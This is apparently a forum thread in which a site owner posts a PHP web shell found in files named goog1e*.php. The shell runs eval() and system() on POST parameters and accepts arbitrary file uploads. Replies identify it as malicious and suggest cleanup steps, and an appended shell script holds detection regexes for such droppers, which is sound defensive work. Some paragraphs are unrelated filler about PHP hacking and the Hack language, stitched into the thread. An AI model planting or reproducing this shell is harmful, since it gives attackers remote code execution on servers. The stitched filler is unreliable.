I recently found 4 bizarre files on my server (that I didn't upload). The filenames were like this: goog1e7a20543b128921.php
And here's the code that was inside them:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
Do you have any idea what this code is supposed to do..? Should I start to panic..?
Thanks.
Web Hacking Techniques: Hypertext Preprocessor or PHP is a server-side programming language used to build websites. Understanding PHP will help hackers understand web hacking techniques better. Server-Side Scripting: PHP is used in server-side scripting.
Yes, of course they could - if the server is penetrated then any file on it is visible. Yes, it's entirely possible for someone to hack a server, via an exploit, or by stealing your password, or via buggy code you or others have written, or a number of different ways.
Hack code is actually compiled to an intermediary language which is what is even processed by the server. This in its sense makes Hack faster than PHP in execution. Though PHP code can also be written in Hack, which makes them interoperable, Hack comes with a difference in its own syntax.
Yep, this is malicious code. This shell script will allow executing code as well as uploading any file if the attacker knows the parameters passed to it. I recommend searching all files for that code, verifying file permissions and changing your passwords just in case.
I would suggest you use HTML Purifier or OWASP to make things a lot more secure.
You must disable the eval construct if you are not using that (and you shouldn't unless you really need to).
Analyze the server settings for any security holes with PHPSecInfo (source: phpsec.org).
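The file search recommended in the answers above, as an added example that is not part of the original thread: a shell function that flags PHP files which pass request input to code-execution calls, keep the client-supplied name in `move_uploaded_file`, or carry the marker string and file-name shape from the question. The rule names, the extension list and the regexes are assumptions to tune for your own code base.

```shell
#!/bin/sh
# Added example: heuristic search for droppers like the one in the question.
# Rule names, the extension list and the regexes are assumptions to tune.

# A code-execution call whose first argument is a variable. The leading class
# skips method calls (->exec) and longer names such as curl_exec.
EXEC_RE='(^|[^[:alnum:]_>$])(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)[[:space:]]*\([[:space:]]*@?\$'
# The file reads attacker-controllable request data.
INPUT_RE='\$_(POST|GET|REQUEST|COOKIE|FILES)[[:space:]]*\['
# move_uploaded_file() whose destination is the client-supplied file name.
UPLOAD_RE='move_uploaded_file[[:space:]]*\(.*,[[:space:]]*\$_FILES[[:space:]]*\[[^]]*][[:space:]]*\[.name.]'
# Marker string taken from the file contents shown in the question.
MARKER='Goog1e_analist_up'

php_files() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php5' \)
}

# Print "rule<TAB>path" for every hit under the directory given as $1.
# Paths containing newlines are not handled.
scan_webshells() {
    php_files "$1" | while IFS= read -r f; do
        if grep -qE "$EXEC_RE" "$f" && grep -qE "$INPUT_RE" "$f"; then
            printf 'exec-on-request-input\t%s\n' "$f"
        fi
        if grep -qE "$UPLOAD_RE" "$f"; then
            printf 'upload-keeps-client-name\t%s\n' "$f"
        fi
        if grep -qF "$MARKER" "$f"; then
            printf 'known-marker\t%s\n' "$f"
        fi
        # File-name shape from the question: "goog1e" with a digit 1.
        case ${f##*/} in
            goog1e*.php) printf 'lookalike-name\t%s\n' "$f" ;;
        esac
    done
}

# Usage: sh scan.sh /path/to/webroot
if [ -n "${1:-}" ]; then
    scan_webshells "$1"
fi
```

A hit is a lead to review by hand, not proof: legitimate code can trip the first rule, and an obfuscated dropper can evade all of them.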